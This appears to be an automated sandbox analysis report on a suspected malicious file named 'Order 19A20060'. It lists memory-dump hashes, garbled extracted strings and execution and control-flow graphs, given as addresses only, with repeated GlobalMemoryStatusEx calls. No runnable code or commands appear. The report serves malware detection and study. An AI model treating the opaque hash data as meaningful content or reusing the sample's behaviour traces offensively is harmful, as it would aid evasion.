                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7a30000_Order 19A20060.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: cbd26d894320ea9aaf17a7a85892b0baf4cf0a72464ac2da26d3412acfed8049
                                                                              • Instruction ID: f6c058516c1dd58b3d2acb8b8e3e4b23e01b6529386704fabb77fa7ae4118a24
                                                                              • Opcode Fuzzy Hash: cbd26d894320ea9aaf17a7a85892b0baf4cf0a72464ac2da26d3412acfed8049
                                                                              • Instruction Fuzzy Hash: 7EE04FB4906108EFCB80EFA8D9416ADBBF4EB48205F1480A9A808D3741EA319E51CF80
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1682928578.0000000007A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A30000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7a30000_Order 19A20060.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 208628523e732a861f7ec730bc720ed4b43271db7f177510526a00e6244f9395
                                                                              • Instruction ID: a4d5542f9cbb79f3446554753c98838fb50050a76f3372a62ed87d809d519dfa
                                                                              • Opcode Fuzzy Hash: 208628523e732a861f7ec730bc720ed4b43271db7f177510526a00e6244f9395
                                                                              • Instruction Fuzzy Hash: DBE0C2B080A20CEBCB01DFA4D4046AD7BF9DB0A201F1089E5E40683260EA324E609781
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1682928578.0000000007A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A30000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7a30000_Order 19A20060.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 02078821ff3bb5082434b3f4ee4654dd8ed52bc58cae206a29ffc67ca804eaba
                                                                              • Instruction ID: 0c4972f475527c4fba21c69bf8606a59d5cc65e1ed47719eb5b7ab5921f5746a
                                                                              • Opcode Fuzzy Hash: 02078821ff3bb5082434b3f4ee4654dd8ed52bc58cae206a29ffc67ca804eaba
                                                                              • Instruction Fuzzy Hash: EEE0927081B309DFCF45CF58D08559DBBF6BF46300F210456F01AAB151DB344941CB49
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1682928578.0000000007A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A30000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7a30000_Order 19A20060.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: d998658d043e34fb3c28911e57343bdc28f1cc870b80d3c6990ae1094c320214
                                                                              • Instruction ID: 4786bb04c47c85ac04bee0542c2e08e0746d168a18e2152e047e31e492ff13c1
                                                                              • Opcode Fuzzy Hash: d998658d043e34fb3c28911e57343bdc28f1cc870b80d3c6990ae1094c320214
                                                                              • Instruction Fuzzy Hash: 9ED05BB0D5E209DFCB48DFA8E4455BC7FBCEB46300F209199E42D23240C7351E54D641
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1682928578.0000000007A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A30000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7a30000_Order 19A20060.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 4f9d4aae4822582ddb8b892468e6cda506dbf30503bbd1f63aeff526390fcdef
                                                                              • Instruction ID: 9053a1dca122ed70ea95035bc9e06291882979b9da795fa4846a6932f46cc930
                                                                              • Opcode Fuzzy Hash: 4f9d4aae4822582ddb8b892468e6cda506dbf30503bbd1f63aeff526390fcdef
                                                                              • Instruction Fuzzy Hash: 33E012B0E16208DFCB40DFB8D54579CBBF4AB49202F1055A9E80993340E6705E54DB52
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1682928578.0000000007A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A30000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7a30000_Order 19A20060.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 0413667ad93f53edf061545b76198cd4c176d92b3b0f110fd48f659d5d67ac0f
                                                                              • Instruction ID: 5eacd3b1db5c46955c350c9300ae18fb0c8fe4f857e7525d11345457acb8c435
                                                                              • Opcode Fuzzy Hash: 0413667ad93f53edf061545b76198cd4c176d92b3b0f110fd48f659d5d67ac0f
                                                                              • Instruction Fuzzy Hash: C3E0B6B4E11208EFCB84DFB8E54969CBBF4EB08251F2081A9E908D7360E731AE54DB41
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1682928578.0000000007A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A30000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7a30000_Order 19A20060.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 062af024cc2c62f9d63057724d0864c3910b1a71d6b70f7ca1375149220d080d
                                                                              • Instruction ID: 29bb84e8c71367772dd6da5a62fc96414ef753e062ed8ae1cc596a7c4f814b0f
                                                                              • Opcode Fuzzy Hash: 062af024cc2c62f9d63057724d0864c3910b1a71d6b70f7ca1375149220d080d
                                                                              • Instruction Fuzzy Hash: FED012B0D112099FCB40DFA8D44529CBBB4AB04201F1041A99808A3250EB315F50CB51
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1682928578.0000000007A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A30000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7a30000_Order 19A20060.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 2a2ef90b1b6da6865ed2315f2774aa560ba00f96902ad6267c7e2f02a671dc55
                                                                              • Instruction ID: bf7c99bf7ff6162ce148fa3f185fff9913e6c1ca438d5c6c0adc1862ee667200
                                                                              • Opcode Fuzzy Hash: 2a2ef90b1b6da6865ed2315f2774aa560ba00f96902ad6267c7e2f02a671dc55
                                                                              • Instruction Fuzzy Hash: 0CD012B0902209DFCB45DF94E50A669B778E746351F108199A44953250DB765E10DB91
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1682928578.0000000007A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A30000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7a30000_Order 19A20060.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: ccd017f770332e54214c42cb31d4b8b4460fa3fe7a6805cf196d01c08b2e2819
                                                                              • Instruction ID: a34e7328d7caee145c5b91f1bc1c437d487935f07fe9f8a0be8e163627a22640
                                                                              • Opcode Fuzzy Hash: ccd017f770332e54214c42cb31d4b8b4460fa3fe7a6805cf196d01c08b2e2819
                                                                              • Instruction Fuzzy Hash: 27B09276A46104AACA149A98B01A0FDF738E7AB263F03A037E21AD201196359A368664
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1683106622.0000000007A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A80000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7a80000_Order 19A20060.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: 4'^q$TJcq$Te^q$pbq$xbaq
                                                                              • API String ID: 0-2576840827
                                                                              • Opcode ID: c9d80dd60f9aff10a7fa532ac812364f78ff0419736261d852a0fc22edc8a781
                                                                              • Instruction ID: d6517fd1bdf3784bb1ca00c75881050b63d1c1634328132e13923f01fdcb996d
                                                                              • Opcode Fuzzy Hash: c9d80dd60f9aff10a7fa532ac812364f78ff0419736261d852a0fc22edc8a781
                                                                              • Instruction Fuzzy Hash: 74B2E374E00228CFDB64DF69C984AD9BBB2FF89304F1581E9D509AB225DB319E85CF40
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1683106622.0000000007A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A80000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7a80000_Order 19A20060.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: TJcq$Te^q$xbaq
                                                                              • API String ID: 0-3225726259
                                                                              • Opcode ID: a0f2bed5fa9e210eed5fa31e1c742e8c460e160bf383f1a87a71b735e65389b4
                                                                              • Instruction ID: 929979fee4bb68f7137a2afe9207a15d305deac49efe010dbcc389215c7d620a
                                                                              • Opcode Fuzzy Hash: a0f2bed5fa9e210eed5fa31e1c742e8c460e160bf383f1a87a71b735e65389b4
                                                                              • Instruction Fuzzy Hash: A9B163B5E016188FDB58DF6AC9446DDBBF2BF88301F14C1A9D809AB364DB345E858F50
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1683106622.0000000007A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A80000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7a80000_Order 19A20060.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: @x7$
                                                                              • API String ID: 0-1287060012
                                                                              • Opcode ID: a9658435d2b55e98f33f4151df43c396f43fbdd723060d3c86e8de0ecf75af53
                                                                              • Instruction ID: 9116624e56472b626e8a56a74811409a4080d2311e2d567864c4cff32c07a5ab
                                                                              • Opcode Fuzzy Hash: a9658435d2b55e98f33f4151df43c396f43fbdd723060d3c86e8de0ecf75af53
                                                                              • Instruction Fuzzy Hash: 1EE1FAB4E101198FCB14DFA9C5809AEFBB2FF89304F248169E825AB356D735AD41CF60
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1682928578.0000000007A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A30000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7a30000_Order 19A20060.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: 4'^q
                                                                              • API String ID: 0-1614139903
                                                                              • Opcode ID: 53767a3ccd3c0114d8f6fbcc8a8d49110c83977bb1f6117e9e9608753652cfde
                                                                              • Instruction ID: e51296cd1f1439bdd9b24a7ad13600236f0fdc1c49c31341b2d572fc86085855
                                                                              • Opcode Fuzzy Hash: 53767a3ccd3c0114d8f6fbcc8a8d49110c83977bb1f6117e9e9608753652cfde
                                                                              • Instruction Fuzzy Hash: F961E970A02209CFDB09DF7AE9416AEBBF3FB88304F14C529D0159B268EB789C55CB50
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1681183403.0000000005720000.00000040.00000800.00020000.00000000.sdmp, Offset: 05720000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_5720000_Order 19A20060.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 77b6642328b8b4d3430a542522f9ff6506f46a60ae559fbab119bfe0a51d6760
                                                                              • Instruction ID: 11c82470b0d46fe11dcc23d2fbcef75bf5f071533c3d91cda9e27e18a0693a8f
                                                                              • Opcode Fuzzy Hash: 77b6642328b8b4d3430a542522f9ff6506f46a60ae559fbab119bfe0a51d6760
                                                                              • Instruction Fuzzy Hash: 8212B8B0401745CBE718EF25FC4C1993BB6BB4AB28F904209D1656F2E9DBB415CACF64
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1683106622.0000000007A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A80000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7a80000_Order 19A20060.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 50ab8f1c166a3ecbf5b849c740f610189f22d035cbcb656ab20d7751736bd2d6
                                                                              • Instruction ID: 82b99cd83204ad93d4680d43787205feb5dbdaf47de2cadccc67902959827403
                                                                              • Opcode Fuzzy Hash: 50ab8f1c166a3ecbf5b849c740f610189f22d035cbcb656ab20d7751736bd2d6
                                                                              • Instruction Fuzzy Hash: 35E11BB4E102198FCB14DFA9C5809AEFBB2FF89304F248169E815AB356D730AD41CF61
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1683106622.0000000007A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A80000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7a80000_Order 19A20060.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: f28871a8b2be7bce3c70621adf4b333b244453a63bda35873d897c7f74ca8d4f
                                                                              • Instruction ID: 2ce5aeaa1514ce449897de2db281c8894b7192542a05a4dc783c6574969430f5
                                                                              • Opcode Fuzzy Hash: f28871a8b2be7bce3c70621adf4b333b244453a63bda35873d897c7f74ca8d4f
                                                                              • Instruction Fuzzy Hash: 75E11CB4E102198FCB14DFA9D5809AEFBB2FF89304F248169E815AB355D730AD41CF61
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1683106622.0000000007A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A80000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7a80000_Order 19A20060.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 560b28e6665d423e422bd2774533c49b5272d2c0854563ce9eb944d644179847
                                                                              • Instruction ID: ede22efec2ae6dd1dd41a85a405b9980feacd01dbc7e80098dfcdf81c8a07c34
                                                                              • Opcode Fuzzy Hash: 560b28e6665d423e422bd2774533c49b5272d2c0854563ce9eb944d644179847
                                                                              • Instruction Fuzzy Hash: D7E1D9B4E101198FCB54DFA9C5809AEFBB2FF89304F248169E825AB356D735AD41CF60
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1683106622.0000000007A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A80000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7a80000_Order 19A20060.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 5e050a7d4105288c463fa8fd0c45fb60254e5eceb9b9549b419acaad991a3d7c
                                                                              • Instruction ID: 309e899aa17383bd1cdb75c328170b77d2623329c0f0789ef01bffa6e854f106
                                                                              • Opcode Fuzzy Hash: 5e050a7d4105288c463fa8fd0c45fb60254e5eceb9b9549b419acaad991a3d7c
                                                                              • Instruction Fuzzy Hash: F0E1F9B4E101198FCB54DFA9C5809AEFBB2FF89304F248169E815AB356DB31AD41CF61
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1683106622.0000000007A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A80000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7a80000_Order 19A20060.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 1c064fe290292ba28a8285608a3292e35d0d0d318356dfae424e5cbb35c48133
                                                                              • Instruction ID: c6db4aa6f8f557b48e81224ae9b5dd76ec146e4bcfde87b656dd885e66227e0b
                                                                              • Opcode Fuzzy Hash: 1c064fe290292ba28a8285608a3292e35d0d0d318356dfae424e5cbb35c48133
                                                                              • Instruction Fuzzy Hash: 15D1C63182075ADACB10EB65D990A9DB7B1FFD5340F10C7AAD10937221EB70AED9CB91
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1683106622.0000000007A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A80000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7a80000_Order 19A20060.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 7f0bbbea0fbb439c542ec715f4f439567b8c2636e343bb249260a97d5c8f06ae
                                                                              • Instruction ID: 3e33c5cdc326f9fea4faf388fa5e89de0994be41d0353f4b6880caf080c1d1bb
                                                                              • Opcode Fuzzy Hash: 7f0bbbea0fbb439c542ec715f4f439567b8c2636e343bb249260a97d5c8f06ae
                                                                              • Instruction Fuzzy Hash: 80D1C53182075ADACB10EB65D990A9DB7B1FFD5340F10C7AAD10937221EB70AED9CB91
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1678082340.0000000003000000.00000040.00000800.00020000.00000000.sdmp, Offset: 03000000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_3000000_Order 19A20060.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 05a40c7bd8f515a79f8e65df1bcc917d91ac06058012f6b36d490c35d6635aaa
                                                                              • Instruction ID: 01e5cfc273f9f2d8e16adebf33eadbb2798af163055e7b062dff106ae6422e1a
                                                                              • Opcode Fuzzy Hash: 05a40c7bd8f515a79f8e65df1bcc917d91ac06058012f6b36d490c35d6635aaa
                                                                              • Instruction Fuzzy Hash: C6A16D36E0120ACFDF19DFB5C4445EEB7B2FF84300B15856AE806AB2A5DB31D945CB90
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1681183403.0000000005720000.00000040.00000800.00020000.00000000.sdmp, Offset: 05720000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_5720000_Order 19A20060.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: adfdb8d4cce81b8802ff1aa263bc24dcc1df67590d65110f68c582f0af920737
                                                                              • Instruction ID: 86e5c14a4843a439d25d14b55d60cb4d673d8a805896c0e6c227ce021a2c3703
                                                                              • Opcode Fuzzy Hash: adfdb8d4cce81b8802ff1aa263bc24dcc1df67590d65110f68c582f0af920737
                                                                              • Instruction Fuzzy Hash: D2C13BB0400745CBD718EF25EC481997BB7FB8AB28F544309D1616B2E9DBB815CACF64
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1683106622.0000000007A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A80000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7a80000_Order 19A20060.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 07efb60f5c6395ea7fa9b7522050463247557b7316e733f7329e0e01eecda06e
                                                                              • Instruction ID: 3bb194137103eb39cea55d9fb714f6faff1cb88b3e1e813da3d34e88ab4bba7a
                                                                              • Opcode Fuzzy Hash: 07efb60f5c6395ea7fa9b7522050463247557b7316e733f7329e0e01eecda06e
                                                                              • Instruction Fuzzy Hash: 565102B4E19209CFCF48DFAAD4445EEBBB5FB8A310F04D126E829A7211D7345985CF51
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1683106622.0000000007A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A80000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7a80000_Order 19A20060.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: b61877fec26512f3c0ebfafe1560b82b16e6e04442ec4da56a5d3254adabcb10
                                                                              • Instruction ID: a02f0a41a33df15f02ffdff6cbf3d161baf821a0ec6dcac2de3d396fdb92a548
                                                                              • Opcode Fuzzy Hash: b61877fec26512f3c0ebfafe1560b82b16e6e04442ec4da56a5d3254adabcb10
                                                                              • Instruction Fuzzy Hash: 5B513DB4E002198FCB14DFA9D9405AEFBF2FF89304F148169D419AB256D7319D42CF61
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1682928578.0000000007A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A30000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7a30000_Order 19A20060.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 21ffa624fb59ffa79e4f0745f01fa189cfaf20c609636dac549991bab9734705
                                                                              • Instruction ID: b496d332c6c256234fd2b2ba396d3d20e2056c9a4a0d946c295836671050e2d4
                                                                              • Opcode Fuzzy Hash: 21ffa624fb59ffa79e4f0745f01fa189cfaf20c609636dac549991bab9734705
                                                                              • Instruction Fuzzy Hash: 11413BB1D01A188BEB6CCF6B8D4079AFAF7BFC9201F14D1BAD40CAA255DB7049858F10
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1682928578.0000000007A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A30000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7a30000_Order 19A20060.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: da3cfa0943c9b67ee3f4cc991b8e2c67d033faf2cc67a23c8f2c2f91879f7d56
                                                                              • Instruction ID: cfffdaaf050ed6382136fd36f04000ab6078c0f0a847727c0d15418d39cab552
                                                                              • Opcode Fuzzy Hash: da3cfa0943c9b67ee3f4cc991b8e2c67d033faf2cc67a23c8f2c2f91879f7d56
                                                                              • Instruction Fuzzy Hash: 3D4104B1D01A189BEB5CCF6B9D4068AFAF3BFC9201F14C1BAD84CAA255EB3405458F51
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1682928578.0000000007A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A30000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7a30000_Order 19A20060.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 7e0fc4a6123e80aa2ff01e7a600aa968fa660e0c45811c6c0465bdd63b14d9f1
                                                                              • Instruction ID: da9c44564d087eb323989ac505e011a090aa2c009c58052f3e28116ef0c8538c
                                                                              • Opcode Fuzzy Hash: 7e0fc4a6123e80aa2ff01e7a600aa968fa660e0c45811c6c0465bdd63b14d9f1
                                                                              • Instruction Fuzzy Hash: 2111A4B1E016588BDB58CFABC8442DEFAF7BFC9300F04C12AD459AA258DB740446CF54
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Execution Graph

                                                                              Execution Coverage:12.3%
                                                                              Dynamic/Decrypted Code Coverage:100%
                                                                              Signature Coverage:0%
                                                                              Total number of Nodes:45
                                                                              Total number of Limit Nodes:7
                                                                              execution_graph 27261 13d0848 27263 13d084e 27261->27263 27262 13d091b 27263->27262 27265 13d1380 27263->27265 27267 13d1396 27265->27267 27266 13d1480 27266->27263 27267->27266 27269 13d7eb0 27267->27269 27270 13d7eba 27269->27270 27271 13d7ed4 27270->27271 27274 6a4fa40 27270->27274 27279 6a4fa31 27270->27279 27271->27267 27276 6a4fa55 27274->27276 27275 6a4fc6a 27275->27271 27276->27275 27277 6a4fc81 GlobalMemoryStatusEx GlobalMemoryStatusEx 27276->27277 27278 6a4fee0 GlobalMemoryStatusEx GlobalMemoryStatusEx 27276->27278 27277->27276 27278->27276 27280 6a4fa55 27279->27280 27281 6a4fc6a 27280->27281 27282 6a4fee0 GlobalMemoryStatusEx GlobalMemoryStatusEx 27280->27282 27283 6a4fc81 GlobalMemoryStatusEx GlobalMemoryStatusEx 27280->27283 27281->27271 27282->27280 27283->27280 27284 13dff9a 27285 13dffa3 27284->27285 27286 13dff56 27284->27286 27287 13dff90 27286->27287 27289 6a4fee0 27286->27289 27290 6a4feea 27289->27290 27292 6a4fcb1 27289->27292 27290->27287 27291 6a4fde2 27291->27287 27292->27291 27296 13deb10 27292->27296 27299 13deb00 27292->27299 27293 6a4fd60 27293->27287 27303 13deb39 27296->27303 27297 13deb1e 27297->27293 27300 13deb10 27299->27300 27302 13deb39 2 API calls 27300->27302 27301 13deb1e 27301->27293 27302->27301 27304 13deb7d 27303->27304 27305 13deb55 27303->27305 27310 13deb39 GlobalMemoryStatusEx 27304->27310 27312 13dec20 27304->27312 27305->27297 27306 13deb9e 27306->27297 27307 13deb9a 27307->27306 27308 13dec66 GlobalMemoryStatusEx 27307->27308 27309 13dec96 27308->27309 27309->27297 27310->27307 27313 13dec66 GlobalMemoryStatusEx 27312->27313 27314 13dec96 27313->27314 27314->27307

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 419 6a43058-6a43079 420 6a4307b-6a4307e 419->420 421 6a43084-6a430a3 420->421 422 6a43833-6a43836 420->422 431 6a430a5-6a430a8 421->431 432 6a430bc-6a430c6 421->432 423 6a4385c-6a4385e 422->423 424 6a43838-6a43857 422->424 426 6a43865-6a43868 423->426 427 6a43860 423->427 424->423 426->420 429 6a4386e-6a43877 426->429 427->426 431->432 434 6a430aa-6a430ba 431->434 437 6a430cc-6a430db 432->437 434->437 547 6a430dd call 6a43881 437->547 548 6a430dd call 6a43888 437->548 438 6a430e2-6a430e4 439 6a430e6-6a430ec 438->439 440 6a430f1-6a433ce 438->440 439->429 461 6a433d4-6a43483 440->461 462 6a43825-6a43832 440->462 471 6a43485-6a434aa 461->471 472 6a434ac 461->472 473 6a434b5-6a434c5 471->473 472->473 476 6a4380c-6a43818 473->476 477 6a434cb-6a434ea 473->477 476->461 478 6a4381e 476->478 477->476 480 6a434f0-6a434fa 477->480 478->462 480->476 481 6a43500-6a4350b 480->481 481->476 482 6a43511-6a435e7 481->482 494 6a435f5-6a43625 482->494 495 6a435e9-6a435eb 482->495 499 6a43627-6a43629 494->499 500 6a43633-6a4363f 494->500 495->494 499->500 501 6a436a5-6a436c0 500->501 502 6a43641-6a43645 500->502 505 6a436c6-6a43702 501->505 506 6a437fd-6a43806 501->506 502->501 503 6a43647-6a43671 502->503 512 6a43673-6a43675 503->512 513 6a4367f-6a4369e 503->513 518 6a43704-6a43706 505->518 519 6a43710-6a4371e 505->519 506->476 506->482 512->513 513->505 517 6a436a0 513->517 517->506 518->519 521 6a43735-6a43740 519->521 522 6a43720-6a4372b 519->522 525 6a43742-6a43748 521->525 526 6a43758-6a43769 521->526 522->521 527 6a4372d 522->527 528 6a4374c-6a4374e 525->528 529 6a4374a 525->529 531 6a43781-6a4378d 526->531 532 6a4376b-6a43771 526->532 527->521 528->526 529->526 536 6a437a5-6a437f6 531->536 537 6a4378f-6a43795 531->537 533 6a43775-6a43777 532->533 534 6a43773 532->534 533->531 534->531 536->506 538 6a43797 537->538 539 6a43799-6a4379b 537->539 538->536 539->536 547->438 548->438
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.4109919696.0000000006A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A40000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_6a40000_Order 19A20060.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: $^q$$^q$$^q$$^q$$^q$$^q
                                                                              • API String ID: 0-2392861976
